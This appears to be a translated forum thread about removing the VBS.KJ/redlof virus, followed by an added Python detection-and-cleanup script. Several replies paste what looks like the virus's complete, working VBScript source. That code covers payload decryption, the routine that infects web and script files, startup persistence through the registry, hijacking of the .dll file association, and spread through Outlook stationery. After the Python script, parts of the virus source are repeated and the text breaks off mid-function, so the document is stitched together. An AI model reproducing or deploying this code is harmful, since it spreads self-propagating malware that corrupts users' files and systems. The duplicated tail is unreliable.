What can remove the folder.htt and desktop.ini files created by a virus?

Time: 2021-12-14 16:07:32
I'm using Kingsoft Duba and it can't handle this, even though it is upgraded to the latest version.

23 solutions

#1


I'm a victim too, following this!

#2


Use Find to locate all the folder.htt and desktop.ini files, then delete them; after rebooting, restore the registry and that takes care of it.

#3


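Is it really that simple?
This is VBS.KJ, also called redlof. It also infects web page files. It does no real harm. Use Kingsoft Duba 2001 (not 2002), update it, and scan; the only downside is that it is very slow.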

#4


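I've been badly hit by this too, but today I got rid of it with the latest Rising; everyone can give it a try.
As for editing the registry, that definitely doesn't work, because I have already tried it. The virus it detected is named "redlof". The scan took me 3 hours today; I'm dizzy, so dizzy.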

#5


This is the VBS.KJ virus; folder.htt has been infected. You can clean it out completely with the latest version of KV3000.

#6


Kingsoft Duba 2001, latest update.
After the scan, delete all folder.htt files.

#7


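Stop using Kingsoft Duba. Our lab used to use Kingsoft Duba. When the problem above appeared, it couldn't remove it; we now use Norton and update it almost every day. Kingsoft Duba's updates are too slow.

Here is a way to handle it for the original poster:
1. If you have no suitable antivirus software:
      a. Search for the two files above and delete all of those that are not on drive C; for those on drive C, compare against an uninfected machine and delete them one by one.
      b. While infected, do not browse files with IE. Use something like WindowsCommand instead.
2. Install Norton and scan. Note that after the scan Desktop.ini files are left behind; those are clean, and you can simply delete them.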

#8


KV3000 or Panda can remove it.
I removed it with KV3000 myself.

#9


Where can I download Norton Enterprise Edition?

#10


Best to just format the hard disk. Otherwise you can't browse in Web page view, which really hurts.

#11


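Don't even mention it. Kingsoft Duba 2002 could still remove it with last month's virus database, but after updating to the latest one it no longer can. So infuriating!!!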

#12


Hehe, they didn't get the signature right!

#13


kill regedit

#14


Best not to use Web page view for the desktop.
I wonder if what you all see looks like this:

<script language=vbscript>
ExeString = "…"

#15


Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 4"&vbCrLf&"KeyArr(1) = 4"&vbCrLf&"KeyArr(2) = 1"&vbCrLf&"KeyArr(3) = 6"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>

#16


Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk

' ------------------------------------------------------------------------------
Sub KJ_start()
    KJSetDim()
    KJCreateMilieu()
    KJLikeIt()
    KJCreateMail()
    KJPropagate()
End Sub


' ------------------------------------------------------------------------------
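' "Infection" function
' Possible values of TypeStr: htt, html, vbs
'
' htt: (.HTT)
'    <BODY onload="vbscript:KJ_start()"> comes first, the original file content is in the middle, and the virus body comes last
' html: (.HTM, .HTML, .ASP, .PHP, .JSP)
'    The original file content comes first, followed by <HTML> <BODY onload="vbscript:KJ_start()"> and the virus body
' vbs: (.VBS)
'    The original file content comes first, followed by the virus body
'
' For .htt files, the infected file contains two blocks of virus code with the original content sandwiched between them
' For all other files, the infected file has a single block of virus code at the end of the file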
' ------------------------------------------------------------------------------
Function KJAppendTo(FilePath,TypeStr)
    On Error Resume Next
    Set ReadTemp = FSO.OpenTextFile(FilePath,1)

    ' TmpStr holds the entire content of the file
    TmpStr = ReadTemp.ReadAll

    ' Skip the file if it is already infected or its length is less than 1
    If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
        ReadTemp.Close
        Exit Function
    End If

    If TypeStr = "htt" Then
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,2)
        FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
        FileTemp.Close
        Set FAttrib = FSO.GetFile(FilePath)
        FAttrib.attributes = 34
    Else
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,8)
        If TypeStr = "html" Then
            FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        ElseIf TypeStr = "vbs" Then
            FileTemp.Write vbCrLf & VbsText
        End If
            FileTemp.Close
    End If
End Function


' ------------------------------------------------------------------------------
Function KJChangeSub(CurrentString,LastIndexChar)
    If LastIndexChar = 0 Then
        If Left(LCase(CurrentString),1) =< LCase("c") Then
            KJChangeSub = FinalyDisk & ":\"
            SubE = 0
        Else
            KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
            SubE = 0
        End If
    Else
        KJChangeSub = Mid(CurrentString,1,LastIndexChar)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJCreateMail()
    On Error Resume Next
    If InWhere = "html" Then
        Exit Function
    End If

    ' Infect C:\Program Files\Common Files\Microsoft Shared\Stationery\blank.htm
    ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
    If (FSO.FileExists(ShareFile)) Then
        Call KJAppendTo(ShareFile,"html")
    Else
        Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
        FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        FileTemp.Close
    End If

    DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
    OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
    WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

    ' Infect all files in the C:\Program Files\Common Files\Microsoft Shared\Stationery folder
    KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

#17


' ------------------------------------------------------------------------------
Function KJCreateMilieu()
    On Error Resume Next
    TempPath = ""
    If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
        TempPath = "system32\"
    End If
    If TempPath = "system32\" Then
        StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
    Else
        StartUpFile = WinPath & "SYSTEM\Kernel.dll"
    End If

    ' Modify the registry so that the virus runs once at every startup
    WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile

    ' This was already copied once earlier; why copy it again here?
    FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
    FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"

    ' Infect C:\Windows\Web\Folder.htt
    Call KJAppendTo(WinPath & "web\Folder.htt","htt")

    ' Allow the virus script disguised as a dynamic-link library to be executed directly
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"

    ' Create C:\Windows\System\Kernel.dll (Kernel32.dll) and write the virus body into it
    ' From then on this virus script is executed once at every startup
    Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
    FileTemp.Write VbsText
    FileTemp.Close
End Function


' ------------------------------------------------------------------------------
Function KJLikeIt()
    If InWhere <> "html" Then
        Exit Function
    End If
    ThisLocation = document.location

    ' Only perform this step when the page is being browsed locally
    If Left(ThisLocation, 4) = "file" Then
        ThisLocation = Mid(ThisLocation,9)
        If FSO.GetExtensionName(ThisLocation) <> "" then
            ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
        End If
        If Len(ThisLocation) > 3 Then
            ThisLocation = ThisLocation & "\"
        End If
        ' Infect every infectable file in this directory
        KJummageFolder(ThisLocation)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJMailReg(RegStr,FileName)
    On Error Resume Next
    RegTempStr = WsShell.RegRead(RegStr)
    If RegTempStr = "" Then
        WsShell.RegWrite RegStr,FileName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJOboSub(CurrentString)
    SubE = 0
    TestOut = 0
    Do While True
        TestOut = TestOut + 1
        If TestOut > 28 Then
            CurrentString = FinalyDisk & ":\"
            Exit Do
        End If
        On Error Resume Next
        Set ThisFolder = FSO.GetFolder(CurrentString)
        Set DicSub = CreateObject("Scripting.Dictionary")
        Set Folders = ThisFolder.SubFolders
        FolderCount = 0
        For Each TempFolder in Folders
            FolderCount = FolderCount + 1
            DicSub.add FolderCount, TempFolder.Name
        Next
        If DicSub.Count = 0 Then
            LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
            SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
            CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            SubE = 1
        Else
            If SubE = 0 Then
                CurrentString = CurrentString & DicSub.Item(1) & "\"
                Exit Do
            Else
                j = 0
                For j = 1 To FolderCount
                    If LCase(SubString) = LCase(DicSub.Item(j)) Then
                        If j < FolderCount Then
                            CurrentString = CurrentString & DicSub.Item(j+1) & "\"
                            Exit Do
                        End If
                    End If
                Next
                LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
                SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
                CurrentString = KJChangeSub(CurrentString,LastIndexChar)
            End If
        End If
    Loop
    KJOboSub = CurrentString
End Function

#18


' ------------------------------------------------------------------------------
Function KJPropagate()
    On Error Resume Next
    RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
    DiskDegree = WsShell.RegRead(RegPathValue)
    If DiskDegree = "" Then
        DiskDegree = FinalyDisk & ":\"
    End If
    For i=1 to 5
        DiskDegree = KJOboSub(DiskDegree)
        KJummageFolder(DiskDegree)
    Next
    WsShell.RegWrite RegPathValue,DiskDegree
End Function


' ------------------------------------------------------------------------------
Function KJummageFolder(PathName)
    On Error Resume Next
    Set FolderName = FSO.GetFolder(PathName)
    Set ThisFiles = FolderName.Files
    HttExists = 0

    ' Infect every matching file in this folder (.htm, .html, .asp, .php, .jsp, .vbs)
    For Each ThisFile In ThisFiles
        FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
        If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
            Call KJAppendTo(ThisFile.Path,"html")
        ElseIf FileExt = "VBS" Then
            Call KJAppendTo(ThisFile.Path,"vbs")
        ElseIf FileExt = "HTT" Then
            HttExists = 1
        End If
    Next
    If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
        HttExists = 1
    End If

    ' If this folder has no .htt file, copy the prepared infected files into it
    ' The purpose is to make the virus run whenever the user browses the folder
    If HttExists = 0 Then
        FSO.CopyFile WinPath & "system32\desktop.ini",PathName
        FSO.CopyFile WinPath & "web\Folder.htt",PathName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJSetDim()
    On Error Resume Next

    ' Determine what kind of file the virus body is running in
    Err.Clear
    TestIt = WScript.ScriptFullname
    If Err Then
        InWhere = "html"
    Else
        InWhere = "vbs"
    End If

    If InWhere = "vbs" Then
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Set WsShell = CreateObject("WScript.Shell")
    Else
        Set AppleObject = document.applets("KJ_guest")
        AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
        AppleObject.createInstance()
        Set WsShell = AppleObject.GetObject()
        AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
        AppleObject.createInstance()
        Set FSO = AppleObject.GetObject()
    End If
    Set DiskObject = FSO.Drives
    For Each DiskTemp In DiskObject
        If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then
            Exit For
        End If
        FinalyDisk = DiskTemp.DriveLetter
    Next

    ' Generate a random encryption key
    Dim OtherArr(3)
    Randomize
    For i=0 To 3
        OtherArr(i) = Int((9 * Rnd))
    Next

    ' Encrypt the virus body with the random key
    ' The encrypted virus body is stored in TempString
    TempString = ""
    For i=1 To Len(ThisText)
        TempNum = Asc(Mid(ThisText,i,1))
        If TempNum = 13 Then
            TempNum = 28
        ElseIf TempNum = 10 Then
            TempNum = 29
        End If
        TempChar = Chr(TempNum - OtherArr(i Mod 4))
        If TempChar = Chr(34) Then
            TempChar = Chr(18)
        End If
        TempString = TempString & TempChar
    Next

    ' Build the data needed for each kind of infection
    ' UnLockStr holds the decryption routine
    UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
    ThisText = "ExeString = """ & TempString & """"
    HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XComponent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>"
    VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

    ' Get the path of the Windows directory
    WinPath = FSO.GetSpecialFolder(0) & "\"

    ' Copy the original C:\Windows\Web\Folder.htt to C:\Windows\Web\kjwall.gif
    If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
        FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
    End If

    ' Copy the original C:\Windows\System32\desktop.ini to C:\Windows\System32\kjwall.gif
    If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
        FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
    End If
End Function

#19


Go to Kingsoft's website; I downloaded a free dedicated removal tool for the New Happy Time virus there, and it solves the problem.

#20


I've run into this; I agree with zhuxiaohua982.
I didn't restore the registry.

#21


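Kingsoft's dedicated tool can clean it up completely. From my own experience it's better not to delete things by hand; the more you delete, the more there are. As for editing the registry, my experience is that after making the changes you should not shut down normally; otherwise, if there is cross-infection, all your effort is wasted. In the past, to deal with some trojans, my approach was to RESET the machine right after the edits (press the RESET button), which works somewhat better!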

#22


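I got hit once too, but it was fine once I deleted them. If web pages are infected as well, open them in Notepad and you will find that after the "html" there is an extra "html" section (the one with vbscript); delete that trailing "html" and it's fine. Not sure if that is correct? In the end there were no problems.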

#23


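This virus is a VB script virus that mainly infects and spreads by copying and executing the virus program.
When it triggers, it searches every directory and copies desktop.ini and folder.htt into it,
and at the same time searches the whole disk for *.html files and adds VB script code to them.
Removal: use the upgraded version of Rising 2002.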
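
An added example, not part of any reply in the thread and not any vendor's tool: a Python checker that uses the file layouts described in the `KJAppendTo` comments in #16 and the manual cleanup described in #22 to classify files and recover their original content. The function and constant names are hypothetical, and the sample files are constructed with a placeholder payload.

```python
import os
import re

NL = rb"\r?\n"
BODY_TAG = rb'<BODY onload="vbscript:KJ_start\(\)">'
# First lines of the script block appended to .htt/.html files (HtmlText in #18).
VSCRIPT = (rb"<script language=vbscript>" + NL +
           rb"document\.write \"<div style='position:absolute;")
# Encrypted body followed by the start of its decoder stub (VbsText in #18).
BLOCK = rb'ExeString = "[^"]*"' + NL + rb'Execute\("Dim KeyArr\(3\),ThisText"'

TAILS = {
    # original + <HTML> + <BODY onload=...> + virus script
    "html": re.compile(NL + rb"<HTML>" + NL + BODY_TAG + NL + VSCRIPT + rb".*\Z", re.S),
    # original + encrypted block + decoder + KJ_start()
    "vbs": re.compile(NL + BLOCK + rb".*KJ_start\(\)\s*\Z", re.S),
    # (<BODY onload=...> prefix) + original + virus script
    "htt": re.compile(NL + VSCRIPT + rb".*\Z", re.S),
}
HTT_HEAD = re.compile(rb"\A" + BODY_TAG + NL)
KINDS = {".htm": "html", ".html": "html", ".asp": "html", ".php": "html",
         ".jsp": "html", ".vbs": "vbs", ".htt": "htt"}


def classify(data, kind):
    """Return (status, original); status is 'clean', 'infected' or 'suspect'."""
    if b"KJ_start()" not in data:      # the marker KJAppendTo itself checks for
        return "clean", data
    body = data
    if kind == "htt":
        head = HTT_HEAD.match(body)
        if not head:
            return "suspect", None
        body = body[head.end():]
    tail = TAILS[kind].search(body)
    if not tail:
        return "suspect", None         # marker present, layout unknown: review by hand
    return "infected", body[:tail.start()]


def scan_tree(root):
    """Return {path: status} for every non-clean file under root."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            kind = KINDS.get(os.path.splitext(name)[1].lower())
            if kind is None:
                continue
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                status, _ = classify(fh.read(), kind)
            if status == "clean":
                continue
            findings[path] = status
            # KJummageFolder copies desktop.ini into a folder together with Folder.htt.
            ini = os.path.join(folder, "desktop.ini")
            if name.lower() == "folder.htt" and os.path.exists(ini):
                findings[ini] = "dropped-with-folder.htt"
    return findings


# Constructed samples: placeholder payload, same layout as KJAppendTo writes.
STUB = (b'ExeString = "PLACEHOLDER"\r\n'
        b'Execute("Dim KeyArr(3),ThisText"&vbCrLf&"...")\r\nExecute(ThisText)')
HTMLTEXT = (b"<script language=vbscript>\r\ndocument.write \"<div style='position:absolute;"
            b" ...'></div>\"\r\n</script>\r\n<script language=vbscript>\r\n" + STUB +
            b"\r\n</script>\r\n</BODY>\r\n</HTML>")
TAG = b'<BODY onload="vbscript:KJ_start()">'
SAMPLES = {
    "html": b"<html><body>hi</body></html>\r\n<HTML>\r\n" + TAG + b"\r\n" + HTMLTEXT,
    "vbs": b'MsgBox "hi"\r\n' + STUB + b"\r\nKJ_start()",
    "htt": TAG + b"\r\n<html>folder view</html>\r\n" + HTMLTEXT,
}

if __name__ == "__main__":
    for kind, sample in SAMPLES.items():
        print(kind, classify(sample, kind))
```

A `suspect` result means the `KJ_start()` marker is present but the surrounding layout does not match, so the file should be inspected by hand rather than truncated automatically.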

Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 4"&vbCrLf&"KeyArr(1) = 4"&vbCrLf&"KeyArr(2) = 1"&vbCrLf&"KeyArr(3) = 6"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script>

#16


Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk

' ------------------------------------------------------------------------------
Sub KJ_start()
    KJSetDim()
    KJCreateMilieu()
    KJLikeIt()
    KJCreateMail()
    KJPropagate()
End Sub


' ------------------------------------------------------------------------------
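' "Infection" routine
' Possible values of TypeStr: htt, html, vbs
'
' htt: (.HTT)
'    <BODY onload="vbscript:KJ_start()"> comes first, then the original file content, then the virus body
' html: (.HTM,.HTML,.ASP,.PHP,.JSP)
'    The original file content comes first, followed by <HTML> <BODY onload="vbscript:KJ_start()"> and the virus body
' vbs: (.VBS)
'    The original file content comes first, followed by the virus body
'
' For .htt files, the infected file contains two pieces of virus code with the original content sandwiched between them
' For all other files, the infected file has a single virus body at the end of the file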
' ------------------------------------------------------------------------------
Function KJAppendTo(FilePath,TypeStr)
    On Error Resume Next
    Set ReadTemp = FSO.OpenTextFile(FilePath,1)

    ' TmpStr holds the entire content of the file
    TmpStr = ReadTemp.ReadAll

    ' Skip the file if it is already infected or its length is less than 1
    If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
        ReadTemp.Close
        Exit Function
    End If

    If TypeStr = "htt" Then
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,2)
        FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
        FileTemp.Close
        Set FAttrib = FSO.GetFile(FilePath)
        FAttrib.attributes = 34
    Else
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath,8)
        If TypeStr = "html" Then
            FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        ElseIf TypeStr = "vbs" Then
            FileTemp.Write vbCrLf & VbsText
        End If
            FileTemp.Close
    End If
End Function


' ------------------------------------------------------------------------------
Function KJChangeSub(CurrentString,LastIndexChar)
    If LastIndexChar = 0 Then
        If Left(LCase(CurrentString),1) =< LCase("c") Then
            KJChangeSub = FinalyDisk & ":\"
            SubE = 0
        Else
            KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
            SubE = 0
        End If
    Else
        KJChangeSub = Mid(CurrentString,1,LastIndexChar)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJCreateMail()
    On Error Resume Next
    If InWhere = "html" Then
        Exit Function
    End If

    ' Infect C:\Program Files\Common Files\Microsoft Shared\Stationery\blank.htm
    ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
    If (FSO.FileExists(ShareFile)) Then
        Call KJAppendTo(ShareFile,"html")
    Else
        Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
        FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
        FileTemp.Close
    End If

    DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
    OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
    WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

    ' Infect every file in the C:\Program Files\Common Files\Microsoft Shared\Stationery folder
    KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

#17


' ------------------------------------------------------------------------------
Function KJCreateMilieu()
    On Error Resume Next
    TempPath = ""
    If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
        TempPath = "system32\"
    End If
    If TempPath = "system32\" Then
        StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
    Else
        StartUpFile = WinPath & "SYSTEM\Kernel.dll"
    End If

    ' Modify the registry so that the virus runs once at every boot
    WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile

    ' This was already copied once earlier; why copy it again here?
    FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
    FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"

    ' Infect C:\Windows\Web\Folder.htt
    Call KJAppendTo(WinPath & "web\Folder.htt","htt")

    ' Make the virus script, disguised as a dynamic-link library, directly executable
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"

    ' Create C:\Windows\System\Kernel.dll (Kernel32.dll) and write the virus body into it
    ' From then on this virus script is executed once at every boot
    Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
    FileTemp.Write VbsText
    FileTemp.Close
End Function


' ------------------------------------------------------------------------------
Function KJLikeIt()
    If InWhere <> "html" Then
        Exit Function
    End If
    ThisLocation = document.location

    ' Only perform this step when the page is being viewed locally
    If Left(ThisLocation, 4) = "file" Then
        ThisLocation = Mid(ThisLocation,9)
        If FSO.GetExtensionName(ThisLocation) <> "" then
            ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
        End If
        If Len(ThisLocation) > 3 Then
            ThisLocation = ThisLocation & "\"
        End If
        ' Infect every infectable file in this directory
        KJummageFolder(ThisLocation)
    End If
End Function


' ------------------------------------------------------------------------------
Function KJMailReg(RegStr,FileName)
    On Error Resume Next
    RegTempStr = WsShell.RegRead(RegStr)
    If RegTempStr = "" Then
        WsShell.RegWrite RegStr,FileName
    End If
End Function


' ------------------------------------------------------------------------------
Function KJOboSub(CurrentString)
    SubE = 0
    TestOut = 0
    Do While True
        TestOut = TestOut + 1
        If TestOut > 28 Then
            CurrentString = FinalyDisk & ":\"
            Exit Do
        End If
        On Error Resume Next
        Set ThisFolder = FSO.GetFolder(CurrentString)
